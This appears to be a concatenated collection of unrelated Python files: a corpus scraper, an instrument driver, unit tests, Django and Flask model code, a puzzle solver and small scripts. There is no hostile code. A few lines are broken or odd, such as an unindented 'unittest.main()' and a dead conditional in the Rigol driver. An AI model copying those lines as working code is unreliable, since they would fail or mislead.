    content = soup.find('div', {'class': 'content'}).text
    res_msg = ('По этому запросу ничего не найдено.' in content or
               'No results match the search query.' in content)
    if res_msg:
        raise ValueError
    return page_html
def does_page_exist(url: str,
                    p_index: int,
                    first_page: str,
                    **kwargs) -> str:
    """
    Whether a page at the index exists.

    It means, the number of the page in 'pager' is equal to expected index.
    RNC redirects to the first page if the page at the number doesn't exist.
    Here it's assumed, that the request's correct.

    :return: last page code if everything is OK.
    :exception ValueError: the page doesn't exist.
    """
    # indexing starts with 0; negative indices are clamped to 0
    start = max(p_index, 0)
    stop = p_index + 1
    # request's correct → first page exists
    if stop == 1:
        return first_page

    last_page = get_htmls(url, start, stop, **kwargs)[0]
    soup = bs4.BeautifulSoup(last_page, 'lxml')
    pager = soup.find('p', {'class': 'pager'})
    if pager:
        # max() raises ValueError on an empty sequence, which is the
        # documented "page doesn't exist" signal
        page_numbers = [
            int(tag.text)
            for tag in pager.find_all('a')
            if tag.text.isdigit()
        ]
        max_page_number = max(page_numbers)
        if not max_page_number or max_page_number < stop:
            raise ValueError
        return last_page
    # if there's no pager, but result exists.
    # this might happen if expand=full or out=kwic
    if last_page == first_page:
        raise ValueError
    return last_page
def is_request_correct(url: str,
                       p_count: int,
                       **kwargs) -> Tuple[str, str]:
    """
    Check:
    – is the HTTP request correct (means there are no exceptions catch).
    – has there been any result.
    – does a page at the number exist (
    means RNC doesn't redirect to the first page).

    :return: first and last pages if everything's OK.
    :exception WrongHTTPRequest: HTTP request is wrong.
    :exception NoResultFound: no result found.
    :exception LastPageDoesntExist: the last page doesn't exist.
    """
    logger.debug("Validating that everything is OK")
    try:
        # to reduce the number of requests
        # the two checks are combined into one.
        # coro writes logs by itself
        first_page = whether_result_found(url, **kwargs)
    except ValueError:
        # ValueError is whether_result_found's "no result" signal
        logger.error("HTTP request is OK, but no result found")
        raise NoResultFound(f"{kwargs}")
    except RuntimeError:
        logger.error("HTTP request is wrong")
        raise WrongHTTPRequest(f"{kwargs}")
    logger.debug("HTTP request is correct, result found")

    logger.debug("Validating that the last page exists")
    try:
        # pages are 0-indexed, so the last page index is p_count - 1
        last_page = does_page_exist(url, p_count - 1, first_page, **kwargs)
    except ValueError:
        logger.error("Everything is OK, but last page doesn't exist")
        raise LastPageDoesntExist(f"{kwargs}")
    logger.debug("The last page exists")
    logger.debug("Validated successfully")
    return first_page, last_page
async def whether_result_found_async(url: str,
                                     **kwargs) -> str:
    """
    Whether the page contains results.

    :return: first page HTML code if everything is OK.
    :exception RuntimeError: if HTTP request was wrong.
    :exception ValueError: if the result not found.
    """
    logger.debug("Validating that the request is OK")
    try:
        page_html = (await get_htmls_async(url, **kwargs))[0]
    except Exception as e:
        logger.error(f"The request is not correct: {kwargs}")
        # chain the original exception so the real cause is not lost
        raise RuntimeError from e
    logger.debug("The request is correct")

    logger.debug("Validating that the result exits")
    soup = bs4.BeautifulSoup(page_html, 'lxml')
    # TODO: narrow the search scope
    content = soup.find('div', {'class': 'content'}).text
    res_msg = ('По этому запросу ничего не найдено.' in content or
               'No results match the search query.' in content)
    if res_msg:
        raise ValueError
    return page_html
async def does_page_exist_async(url: str,
                                p_index: int,
                                first_page: str,
                                **kwargs) -> str:
    """
    Whether a page at the index exists.

    It means, the number of the page in 'pager' is equal to expected index.
    RNC redirects to the first page if the page at the number doesn't exist.
    Here it's assumed, that the request's correct.

    :return: last page code if everything is OK.
    :exception ValueError: the page doesn't exist.
    """
    # indexing starts with 0; negative indices are clamped to 0
    start = max(p_index, 0)
    stop = p_index + 1
    # request's correct → first page exists
    if stop == 1:
        return first_page

    last_page = (await get_htmls_async(url, start, stop, **kwargs))[0]
    soup = bs4.BeautifulSoup(last_page, 'lxml')
    pager = soup.find('p', {'class': 'pager'})
    if pager:
        # max() raises ValueError on an empty sequence, which is the
        # documented "page doesn't exist" signal
        page_numbers = [
            int(tag.text)
            for tag in pager.find_all('a')
            if tag.text.isdigit()
        ]
        max_page_number = max(page_numbers)
        if not max_page_number or max_page_number < stop:
            raise ValueError
        return last_page
    # if there's no pager, but result exists.
    # this might happen if expand=full or out=kwic
    if last_page == first_page:
        raise ValueError
    return last_page
async def is_request_correct_async(url: str,
                                   p_count: int,
                                   **kwargs) -> Tuple[str, str]:
    """
    Check:
    – is the HTTP request correct (means there are no exceptions catch).
    – has there been any result.
    – does a page at the number exist (
    means RNC doesn't redirect to the first page).

    :return: first and last pages if everything's OK.
    :exception WrongHTTPRequest: HTTP request is wrong.
    :exception NoResultFound: no result found.
    :exception LastPageDoesntExist: the last page doesn't exist.
    """
    logger.debug("Validating that everything is OK")
    try:
        # to reduce the number of requests
        # the two checks are combined into one.
        # coro writes logs by itself
        first_page = await whether_result_found_async(url, **kwargs)
    except ValueError:
        # ValueError is whether_result_found_async's "no result" signal
        logger.error("HTTP request is OK, but no result found")
        raise NoResultFound(f"{kwargs}")
    except RuntimeError:
        logger.error("HTTP request is wrong")
        raise WrongHTTPRequest(f"{kwargs}")
    logger.debug("HTTP request is correct, result found")

    logger.debug("Validating that the last page exists")
    try:
        # pages are 0-indexed, so the last page index is p_count - 1
        last_page = await does_page_exist_async(
            url, p_count - 1, first_page, **kwargs)
    except ValueError:
        logger.error("Everything is OK, but last page doesn't exist")
        raise LastPageDoesntExist(f"{kwargs}")
    logger.debug("The last page exists")
    logger.debug("Validated successfully")
    return first_page, last_page
async def fetch_media_file(url: str,  # type: ignore
                           ses: aiohttp.ClientSession,
                           **kwargs) -> Optional[Union[bytes, int]]:
    """
    Coro, getting media content to write.

    :return: bytes (media) if everything is OK,
     -1 if there's 429 error, None if it is another error.
    :exception: all exceptions should be processed here.
    """
    worker_name = kwargs.pop('worker_name', '')
    try:
        resp = await ses.get(url, allow_redirects=True, params=kwargs)
    except Exception as e:
        logger.error(
            f"{e}\n{worker_name}Cannot get "
            f"answer from '{url}' with {kwargs}")
        return  # type: ignore
    if resp.status == 200:
        content = await resp.read()
        resp.close()
        return content
    elif resp.status == 429:
        resp.close()
        return -1
    # log format made consistent with fetch_html: prefix with worker name
    logger.error(
        f"{worker_name}{resp.status} -- '{resp.reason}' "
        f"requesting to {resp.url}"
    )
    resp.close()
async def dump(content: bytes,
               filename: str) -> None:
    """ Dump content to media file.

    :param content: raw bytes to write.
    :param filename: path of the target file; opened in 'wb' mode,
     so existing content is overwritten.
    """
    async with aiofiles.open(filename, 'wb') as f:
        await f.write(content)
async def worker_fetching_media(worker_name: str,
                                q_args: asyncio.Queue) -> None:
    """
    Worker getting media file and dumping it to file.

    Waits WAIT seconds and requests again if there's a 429 error.
    Returns silently when q_args is exhausted instead of dying with
    an unretrieved asyncio.QueueEmpty exception.
    """
    while True:
        try:
            url, ses, filename = q_args.get_nowait()
        except asyncio.QueueEmpty:
            # no more files to download
            return
        logger.debug(f"{worker_name}Requested to '{url}'")
        content = await fetch_media_file(url, ses, worker_name=worker_name)
        if content is None:
            # unrecoverable error, already logged inside fetch_media_file
            q_args.task_done()
            return
        while content == -1:
            # 429 Too many requests – back off and retry the same file
            logger.debug(
                f"{worker_name}: 429 'Too many requests', "
                f"url: {url}; wait {WAIT}s"
            )
            await asyncio.sleep(WAIT)
            content = await fetch_media_file(url, ses, worker_name=worker_name)
        logger.debug(f"{worker_name}Received from '{url}'")

        # NOTE(review): the log messages say '(unknown)' although filename
        # is in scope — possibly redacted text; confirm intended wording.
        logger.debug(f"{worker_name}Dumping '{url}' to '(unknown)'")
        await dump(content, filename)  # type: ignore
        logger.debug(f"{worker_name}'(unknown)' dumped")
        q_args.task_done()
async def download_docs_coro(url_to_name: List[Tuple[str, str]]) -> None:
    """ Coro running 5 workers to download media files. """
    timeout = aiohttp.ClientTimeout(WAIT)
    q_args: asyncio.Queue = asyncio.Queue(maxsize=-1)
    async with aiohttp.ClientSession(timeout=timeout) as ses:
        # one queue entry per (url, destination filename) pair
        for url, filename in url_to_name:
            await q_args.put((url, ses, filename))
        tasks = [
            asyncio.create_task(
                worker_fetching_media(f"Worker-{n + 1}: ", q_args))
            for n in range(5)
        ]
        await q_args.join()
        for task in tasks:
            task.cancel()
def download_docs(url_to_name: List[Tuple[str, str]]) -> None:
    """
    Run coro, download the files.

    :param url_to_name: list of tuples of str, pairs: url – filename.
    """
    logger.info(f"Requested {len(url_to_name)} files to download")
    began_at = time.time()
    # drive the async download pipeline from synchronous code
    asyncio.run(download_docs_coro(url_to_name))
    logger.info(f"Downloading completed, coro executing time: "
                f"{round(time.time() - began_at, 2)}s")
async def download_docs_async(url_to_name: List[Tuple[str, str]]) -> None:
    """
    Run coro, download the files.

    :param url_to_name: list of tuples of str, pairs: url – filename.
    """
    logger.info(f"Requested {len(url_to_name)} files to download")
    began_at = time.time()
    # same as download_docs, but awaitable from an existing event loop
    await download_docs_coro(url_to_name)
    logger.info(f"Downloading completed, coro executing time: "
                f"{round(time.time() - began_at, 2)}s")
|
python
|
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2014 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .. import ivi
from .. import dcpwr
from .. import scpi
# Tracking modes supported by this driver family.
TrackingType = set(['floating'])
# Maps IVI trigger source names to the instrument's SCPI mnemonics.
TriggerSourceMapping = {
    'immediate': 'imm',
    'bus': 'bus'}
class rigolBaseDCPwr(scpi.dcpwr.Base, scpi.dcpwr.Trigger, scpi.dcpwr.SoftwareTrigger,
                     scpi.dcpwr.Measurement):
    "Rigol generic IVI DC power supply driver"

    def __init__(self, *args, **kwargs):
        # Only set the default id when a subclass has not already done so.
        self.__dict__.setdefault('_instrument_id', '')

        super(rigolBaseDCPwr, self).__init__(*args, **kwargs)

        self._output_count = 3

        # Per-channel capabilities: range name -> (max volts, max amps),
        # plus over-voltage/over-current protection limits.
        # The third channel is a negative rail (negative voltage limits).
        self._output_spec = [
            {
                'range': {
                    'P8V': (8.0, 5.0)
                },
                'ovp_max': 8.8,
                'ocp_max': 5.5,
                'voltage_max': 8.0,
                'current_max': 5.0
            },
            {
                'range': {
                    'P30V': (30.0, 2.0)
                },
                'ovp_max': 33.0,
                'ocp_max': 2.2,
                'voltage_max': 30.0,
                'current_max': 2.0
            },
            {
                'range': {
                    'N30V': (-30.0, 2.0)
                },
                'ovp_max': -33.0,
                'ocp_max': 2.2,
                'voltage_max': -30.0,
                'current_max': 2.0
            }
        ]

        # Number of setup slots addressable via *sav/*rcl (1..10).
        self._memory_size = 10

        self._identity_description = "Rigol generic IVI DC power supply driver"
        self._identity_identifier = ""
        self._identity_revision = ""
        self._identity_vendor = ""
        self._identity_instrument_manufacturer = "Rigol Technologies"
        self._identity_instrument_model = ""
        self._identity_instrument_firmware_revision = ""
        self._identity_specification_major_version = 3
        self._identity_specification_minor_version = 0
        self._identity_supported_instrument_models = ['DP831A', 'DP832', 'DP832A']

        # Expose save/recall through the ivi method tree:
        # instrument.memory.save(i) / instrument.memory.recall(i).
        self._add_method('memory.save',
                         self._memory_save)
        self._add_method('memory.recall',
                         self._memory_recall)

        self._init_outputs()

    def _get_bool_str(self, value):
        """
        redefining to change behavior from '0'/'1' to 'off'/'on'
        """
        if bool(value):
            return 'on'
        return 'off'

    def _memory_save(self, index):
        """Save the current instrument state to setup slot *index* (1-based)."""
        index = int(index)
        if index < 1 or index > self._memory_size:
            raise OutOfRangeException()
        if not self._driver_operation_simulate:
            self._write("*sav %d" % index)

    def _memory_recall(self, index):
        """Recall the instrument state stored in setup slot *index* (1-based)."""
        index = int(index)
        if index < 1 or index > self._memory_size:
            raise OutOfRangeException()
        if not self._driver_operation_simulate:
            self._write("*TST?" if False else "*rcl %d" % index)

    def _utility_self_test(self):
        """Run the instrument self test via *TST?.

        :return: tuple (code, message); code is 0 on success and -1 when
            the response contains 'FAIL'.
        """
        code = 0
        message = "No Response"
        if not self._driver_operation_simulate:
            self._write("*TST?")
            # wait for test to complete
            message = self._read()
            if 'FAIL' in message:
                code = -1
        return (code, message)
|
python
|
from maskcnn import training_aux_wrapper
from sys import argv
def main():
    """Parse CLI arguments and launch one maskcnn training run.

    Expects exactly six positional arguments:
    dataset, image_subset, neuron_subset, seed, arch_name, opt_name.
    """
    args = argv[1:]
    if len(args) != 6:
        # fail with a usage message instead of an opaque unpack ValueError
        raise SystemExit(
            'usage: dataset image_subset neuron_subset seed arch_name opt_name'
        )
    dataset, image_subset, neuron_subset, seed, arch_name, opt_name = args
    training_aux_wrapper.train_one_wrapper(
        dataset, image_subset, neuron_subset, int(seed), arch_name, opt_name)


if __name__ == '__main__':
    main()
|
python
|
import numpy
import unittest
import sycomore
from sycomore.units import *
class TestBloch(unittest.TestCase):
    """Regression tests for sycomore.bloch operators.

    Each test compares a 4x4 homogeneous Bloch matrix against
    pre-computed reference values.
    """

    def test_pulse(self):
        # RF pulse: 47 deg flip angle, 23 deg phase.
        M = sycomore.bloch.pulse(47*deg, 23*deg)
        numpy.testing.assert_almost_equal(
            M,
            [[ 0.95145043,  0.11437562,  0.28576266,  0.        ],
             [ 0.11437562,  0.73054793, -0.67321463,  0.        ],
             [-0.28576266,  0.67321463,  0.68199836,  0.        ],
             [ 0.        ,  0.        ,  0.        ,  1.        ]])

    def test_time_interval(self):
        # Relaxation combined with 420 Hz off-resonance precession over 10 ms.
        M = sycomore.bloch.time_interval(
            sycomore.Species(1000*ms, 100*ms, delta_omega=420*Hz), 10*ms)
        numpy.testing.assert_almost_equal(
            M,
            [[ 0.27961014, -0.86055152,  0.        ,  0.        ],
             [ 0.86055152,  0.27961014,  0.        ,  0.        ],
             [ 0.        ,  0.        ,  0.99004983,  0.00995017],
             [ 0.        ,  0.        ,  0.        ,  1.        ]])

    def test_relaxation(self):
        # Pure T1/T2 relaxation (T1=1000 ms, T2=100 ms) over 10 ms.
        M = sycomore.bloch.relaxation(sycomore.Species(1000*ms, 100*ms), 10*ms)
        numpy.testing.assert_almost_equal(
            M,
            [[0.90483742, 0.        , 0.        , 0.        ],
             [0.        , 0.90483742, 0.        , 0.        ],
             [0.        , 0.        , 0.99004983, 0.00995017],
             [0.        , 0.        , 0.        , 1.        ]])

    def test_phase_accumulation(self):
        # In-plane rotation by pi/6 radians.
        M = sycomore.bloch.phase_accumulation(numpy.pi/6*rad)
        numpy.testing.assert_almost_equal(
            M,
            [[ 0.8660254, -0.5      ,  0.       ,  0.       ],
             [ 0.5      ,  0.8660254,  0.       ,  0.       ],
             [ 0.       ,  0.       ,  1.       ,  0.       ],
             [ 0.       ,  0.       ,  0.       ,  1.       ]])
if __name__ == "__main__":
unittest.main()
|
python
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from project.tweets.views import TweetsViewset
# Single DRF router exposing the tweets API; TweetsViewset handles the
# standard list/detail routes under the "tweets" prefix.
router = DefaultRouter()
router.register(r"tweets", TweetsViewset, basename="tweets")

urlpatterns = [
    path("", include(router.urls)),
]
|
python
|
import random
import names
import csv
from django.template.defaultfilters import slugify
from orcamentos.crm.models import Customer, Person, PhonePerson
from orcamentos.utils.lists import COMPANY_LIST
from orcamentos.utils.gen_random_values import (
gen_cpf,
gen_digits,
gen_phone,
gen_rg,
)
from orcamentos.utils.gen_names import (
gen_female_first_name,
gen_male_first_name,
)
customer_list = []
address_list = []

# Read customer rows from clientes_.csv.
# 'with' closes the file automatically — no explicit close() needed.
with open('fix/clientes_.csv', 'r') as f:
    for dct in csv.DictReader(f):
        customer_list.append(dct)

# Read address rows from enderecos_.csv.
with open('fix/enderecos_.csv', 'r') as f:
    for dct in csv.DictReader(f):
        address_list.append(dct)
# Seed the first len(customer_list) customers from the CSV fixture,
# plus 8 fully random ones.
REPEAT = len(customer_list) + 8
photo = 'http://icons.iconarchive.com/icons/icons-land/vista-people/256/Office-Customer-Male-Light-icon.png'

for i in range(REPEAT):
    g = random.choice(['M', 'F'])
    # Draw the random name ONCE so treatment and first_name come from the
    # same draw (previously the generator was called twice, which could
    # pair a treatment with a mismatching first name).
    if g == 'M':
        name_data = gen_male_first_name()
    else:
        name_data = gen_female_first_name()
    treatment = name_data['treatment']
    first_name = name_data['first_name']
    last_name = names.get_last_name()
    if i < 17:
        # Entries sourced from the CSV fixture.
        gender = 'M'
        treatment = None
        first_name = customer_list[i]['first_name']
        last_name = None
        company = None
        customer_type = customer_list[i]['customer_type']
        email = None
    else:
        gender = g
        company = random.choice(COMPANY_LIST)
        customer_type = 'p'
        email = first_name[0].lower() + '.' + \
            last_name.lower() + '@example.com'
    # 'p' = pessoa física (CPF/RG); otherwise company (CNPJ/IE).
    if customer_type == 'p':
        cpf = gen_cpf()
        rg = gen_rg()
        cnpj = None
        ie = None
    else:
        cpf = None
        rg = None
        cnpj = gen_digits(14)
        ie = 'isento'
    slug = slugify('{} {}'.format(first_name, last_name))
    obj = Customer(
        person_type='c',
        # BUG FIX: this previously passed gender=g, silently discarding the
        # forced 'M' gender assigned to the CSV-sourced customers above.
        gender=gender,
        treatment=treatment,
        first_name=first_name,
        last_name=last_name,
        slug=slug,
        photo=photo,
        company=company,
        email=email,
        customer_type=customer_type,
        cpf=cpf,
        rg=rg,
        cnpj=cnpj,
        ie=ie,
        address=address_list[i]['address'],
        district=address_list[i]['district'],
        city=address_list[i]['city'],
        uf=address_list[i]['uf'],
        cep=address_list[i]['cep'],
    )
    obj.save()
# done
'''
Para cada Person incluimos dois telefones:
um principal e um celular
'''
# Create two phones per customer (default/primary and mobile) and insert
# them in a single bulk query.
customers = Customer.objects.all()
phones = []
for person in customers:
    phones.append(PhonePerson(
        phone=gen_phone(),
        person=person,
    ))
    phones.append(PhonePerson(
        phone=gen_phone(),
        person=person,
        phone_type='cel'
    ))
PhonePerson.objects.bulk_create(phones)
|
python
|
from urllib.request import urlopen
def get_page_3(url):
    """Download *url* and return its body decoded as UTF-8.

    Uses a context manager so the connection is closed even when
    reading or decoding fails (the original closed only on success).
    """
    with urlopen(url) as pagina:
        return pagina.read().decode('utf')
def get_next_target(website):
    """Return the first '<a href' URL found in *website*.

    :param website: HTML source to scan.
    :return: the URL between the first pair of double quotes after the
        first '<a href' tag, or -1 when no link is present (mirrors the
        str.find sentinel).
    """
    start_link = website.find('<a href')
    if start_link == -1:
        return -1
    start_quote = website.find('"', start_link)
    end_quote = website.find('"', start_quote + 1)
    # NOTE: the original also computed the remaining page text here,
    # but never used or returned it — dropped as dead code.
    return website[start_quote + 1:end_quote]
page = get_page_3('http://xkcd.com/353')

# BUG FIX: the original loop called get_next_target(page) on the SAME
# unchanged page forever, printing the first link in an infinite loop.
# Here the already-scanned prefix is sliced off after every hit so the
# scan makes progress and terminates.
remaining = page
url = get_next_target(remaining)
while url != -1:
    print(url)
    # advance past the link that was just printed
    start_quote = remaining.find('"', remaining.find('<a href'))
    end_quote = remaining.find('"', start_quote + 1)
    remaining = remaining[end_quote + 1:]
    url = get_next_target(remaining)
print(page)
|
python
|
/home/runner/.cache/pip/pool/cf/51/25/b749cb02a5396340ce9fda7fffc4272d66af9443a947242291d6202aba
|
python
|
def proc():
    """Read a name from stdin and append it to ./dict/person.dic.

    The name is appended (tagged '/NNP') only when it does not already
    occur on some line of the dictionary file.
    """
    # 'word' instead of the original 'str', which shadowed the builtin.
    word = input()
    # 'with' guarantees the handle is closed even on the early return
    # (the original leaked the file when the word was already present).
    with open('./dict/person.dic', mode='rt', encoding='utf-8') as fp:
        for line in fp:
            if word in line:
                # already known — silently skip, as before
                return
    with open('./dict/person.dic', mode='at', encoding='utf-8') as fp:
        fp.write('\n%s/NNP' % word)
    print('Added!')
# Keep prompting for names until the process is interrupted (Ctrl+C/EOF).
while True:
    proc()
|
python
|
import numpy as np
import libs.state_node as STTREE
class HillClimbing:
    """Hill-climbing solver for the sliding puzzle.

    Allows up to *k* consecutive lateral moves (moves to equally-scored
    neighbours) before the search gives up, using the Manhattan distance
    as the evaluation function.
    """

    def __init__(self, initialPuzzle, answerPuzzle, k):
        self.totalExpansions = 0   # number of node expansions performed
        self.k = k                 # allowed consecutive lateral movements
        self.answerPuzzle = answerPuzzle.puzzle
        # frontier holds (node, heuristic value, path cost) tuples
        self.frontier = []
        self.frontier.append(
            (
                STTREE.StateNode(initialPuzzle.puzzle, initialPuzzle.n),
                self.manhattanDistance(initialPuzzle.puzzle),
                0,
            )
        )
        self.path = []             # sequence of accepted puzzle states

    def manhattanDistance(self, actualPuzzle):
        # Calculates the Manhattan Distance: sum of the distances of each piece to it's correct position
        # NOTE(review): assumes actualPuzzle is a numpy 2-D array
        # (np.where is used for piece lookup) — confirm at call sites.
        totalDist = 0
        actualPiece = 1
        for x in range(len(actualPuzzle)):
            for y in range(len(actualPuzzle[x])):
                # the last cell is the blank and is not scored
                if not (x == len(actualPuzzle) - 1 and y == len(actualPuzzle[x]) - 1):
                    actualCoord = np.where(actualPuzzle == actualPiece)
                    coordX, coordY = actualCoord[0][0], actualCoord[1][0]
                    totalDist += abs(x - coordX) + abs(y - coordY)
                    actualPiece += 1
        return totalDist

    def checkNodeSolution(self, nodePuzzle):
        # True when the node's puzzle equals the goal configuration.
        return np.array_equal(nodePuzzle, self.answerPuzzle)

    def insertNodeToFrontier(self, node, actualCost):
        # If the node action exists
        if node:
            self.frontier.append(
                (node, self.manhattanDistance(node.puzzle), actualCost + 1)
            )

    def sortFrontier(self):
        # Best (lowest heuristic) node first.
        self.frontier = sorted(self.frontier, key=lambda x: x[1])

    def execute(self):
        """Run the search.

        :return: (final node, total expansions, cost of the final node);
            the final node is the goal if reached, otherwise the best
            node found before the search stalled.
        """
        # Initializing the actual distance with the greater possible value
        actualDistance = float("inf")
        k = self.k
        while len(self.frontier) > 0:
            self.sortFrontier()
            newNode, newDistance, newCost = self.frontier.pop(0)
            # If the avaliation function (Manhattan Distance) of the new node is smaller than the old actual node, reset the k for lateral movements
            if newDistance < actualDistance:
                k = self.k
                actualNode, actualDistance, actualCost = newNode, newDistance, newCost
                self.path.append(actualNode.puzzle)
            elif newDistance == actualDistance:
                # If the remaining lateral movements is greater than 0, move laterally and decrease k by 1
                if k > 0:
                    k -= 1
                    actualNode, actualDistance, actualCost = (
                        newNode,
                        newDistance,
                        newCost,
                    )
                    self.path.append(actualNode.puzzle)
                # If the remaining lateral movements is 0, return the actual node
                else:
                    return actualNode, self.totalExpansions, actualCost
            # If no frontier node is better than then actual one, finish the Hill Climbing and return the actual node
            else:
                return actualNode, self.totalExpansions, actualCost
            if self.checkNodeSolution(actualNode.puzzle):
                return actualNode, self.totalExpansions, actualCost
            else:
                actualNode.expand()
                self.totalExpansions += 1
                # Clears the frontier to insert the new nodes
                self.frontier.clear()
                self.insertNodeToFrontier(actualNode.up, actualCost)
                self.insertNodeToFrontier(actualNode.down, actualCost)
                self.insertNodeToFrontier(actualNode.left, actualCost)
                self.insertNodeToFrontier(actualNode.right, actualCost)
        # If, for some reason, the solver doesn't found a solution, then return the last actual node as an answer
        return actualNode, self.totalExpansions, actualCost
|
python
|
# Generated by Django 3.1.13 on 2021-09-28 03:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration altering the Property decimal fields
    (property_area and property_price) — do not edit by hand."""

    dependencies = [
        ('property', '0010_auto_20210928_0430'),
    ]

    operations = [
        migrations.AlterField(
            model_name='property',
            name='property_area',
            field=models.DecimalField(decimal_places=2, default=0.0, max_digits=20, verbose_name='Area Sq/Ft'),
        ),
        migrations.AlterField(
            model_name='property',
            name='property_price',
            field=models.DecimalField(decimal_places=2, default=0.0, help_text='if your price type is sq/ft, then the price cost should be by a unit of the property area square feet and leave the total we will automatically round it up for you by the total area numbers you have ', max_digits=20, verbose_name='Property Price'),
        ),
    ]
|
python
|
from supermarket import Supermarket
from Markov import Get_Entry
# Entry data passed to the supermarket (presumably Markov transition
# input — confirm against Markov.Get_Entry).
entry = Get_Entry()

lidl = Supermarket(name='LIDL', entry = entry)

# Main simulation loop: one iteration per simulated minute, until closing.
while lidl.is_open():
    # increase the time of the supermarket by one minute
    # generate new customers at their initial location
    # repeat from step 1
    lidl.add_new_customers()
    lidl.print_customers()
    lidl.next_minute()
    # remove churned customers from the supermarket
    lidl.remove_exitsting_customers()
|
python
|
"""
Timeseries plots with error bands
=================================
_thumb: .5, .45
"""
import seaborn as sns
sns.set(style="darkgrid")

# Load an example dataset with long-form data
fmri = sns.load_dataset("fmri")

# Plot the responses for different events and regions;
# lineplot draws the error bands mentioned in the module docstring.
sns.lineplot(x="timepoint", y="signal",
             hue="region", style="event",
             data=fmri)
|
python
|
from typing import Literal, Any, List, Dict
from flask_sqlalchemy import SQLAlchemy
from base64 import b32encode
from flask import session
from globals import *
import xml.etree.ElementTree as ET
import sqlite3
import secrets
import random
import error
import re
import os
db = SQLAlchemy(app)

# User roles; 'g' is the guest role (see get_user / User.as_dict).
# 's' and 'u' are presumably system/admin and regular user — confirm.
Role = Literal['s', 'u', 'g']
# Permission levels; ordered weakest-to-strongest in PERMISSION_ORDER,
# whose indices are compared to rank permissions (see set_permission_link).
Permission = Literal['o', 'w', 'r', 'n']
PERMISSION_ORDER = ['n', 'r', 'w', 'o']
class User(db.Model):
    __tablename__ = "Users"
    id = db.Column(db.Integer, primary_key=True)  #: User Id
    CasLogin = db.Column(db.String(80), unique=True, nullable=False)  #: CAS Login
    Pesel = db.Column(db.String(11), nullable=True)  #: PESEL number of the user
    FetchData = db.Column(db.Boolean, nullable=False)  #: No use of this value is implemented yet
    Role = db.Column(db.String, default='g', nullable=False)  #: The user's role in the system ('g' = guest)

    def as_dict(self):
        """Serialize the user for the frontend.

        :return: dict with id, the CAS login's part before '@',
            fetchData, role and a ``logged`` flag (True for any role
            other than guest); a ``debug`` flag is added when DEBUG is on.
        """
        ud = {
            "id": self.id,
            "casLogin": self.CasLogin.split('@')[0],
            "fetchData": self.FetchData,
            "role": self.Role,
            "logged": self.Role != 'g',
        }
        if DEBUG:
            ud["debug"] = True
        return ud
class Survey(db.Model):
    __tablename__ = "Surveys"
    id = db.Column(db.Integer, primary_key=True)  #: Survey Id
    Name = db.Column(db.String(80), nullable=False)  #: Title of the survey
    AnkieterId = db.Column(db.Integer, unique=True)  #: Id of the Survey in USOS Ankieter
    StartedOn = db.Column(db.DateTime, nullable=True)  #: Start date of the survey
    EndsOn = db.Column(db.DateTime, nullable=True)  #: End date of the survey
    IsActive = db.Column(db.Integer, nullable=True)  #: No use of this value is implemented yet
    QuestionCount = db.Column(db.Integer, nullable=True)  #: Number of questions in the survey
    BackgroundImg = db.Column(db.String(50), default=None)  #: Filename of the survey's background image in the menu
    AuthorId = db.Column(db.Integer, db.ForeignKey('Users.id'))  #: Id of the user who created the survey
class Report(db.Model):
    __tablename__ = "Reports"
    id = db.Column(db.Integer, primary_key=True)  #: Report Id
    Name = db.Column(db.String(80), nullable=False)  #: Title of the report
    SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), nullable=False)  #: Id of the source survey
    BackgroundImg = db.Column(db.String(50))  #: Filename of the report's background image in the menu
    AuthorId = db.Column(db.Integer, db.ForeignKey('Users.id'))  #: Id of the user who created the report
class UserGroup(db.Model):
    __tablename__ = "UserGroups"
    UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True)  #: Id of the user that belongs to a group
    Group = db.Column(db.String(25), primary_key=True)  #: The name of the group
class SurveyGroup(db.Model):
    __tablename__ = "SurveyGroups"
    SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), primary_key=True)  #: Id of the survey that belongs to a group
    Group = db.Column(db.String(25), primary_key=True)  #: The name of the group
class ReportGroup(db.Model):
    __tablename__ = "ReportGroups"
    ReportId = db.Column(db.Integer, db.ForeignKey('Reports.id'), primary_key=True)  #: Id of the report that belongs to a group
    Group = db.Column(db.String(25), primary_key=True)  #: The name of the group
class SurveyPermission(db.Model):
    __tablename__ = "SurveyPermissions"
    SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), primary_key=True)  #: The Id of the survey the permission is to
    UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True)  #: The Id of the user that holds the permission
    Type = db.Column(db.String, default='r', nullable=False)  #: The type of the permission (see Permission; defaults to read)
class ReportPermission(db.Model):
    __tablename__ = "ReportPermissions"
    ReportId = db.Column(db.Integer, db.ForeignKey('Reports.id'), primary_key=True)  #: The Id of the report the permission is to
    UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True)  #: The Id of the user that holds the permission
    Type = db.Column(db.String, default='r', nullable=False)  #: The type of the permission (see Permission; defaults to read)
class Link(db.Model):
    __tablename__ = "Links"
    id = db.Column(db.Integer, primary_key=True)  #: Link Id
    Salt = db.Column(db.String(SALT_LENGTH))  #: The salt of the link
    PermissionType = db.Column(db.String, default='r', nullable=False)  #: Permission granted by the link
    ObjectType = db.Column(db.String, nullable=False)  #: Type of the object the permission is to ('s' = survey, 'r' = report)
    ObjectId = db.Column(db.Integer, nullable=False)  #: Id of the object the permission is to
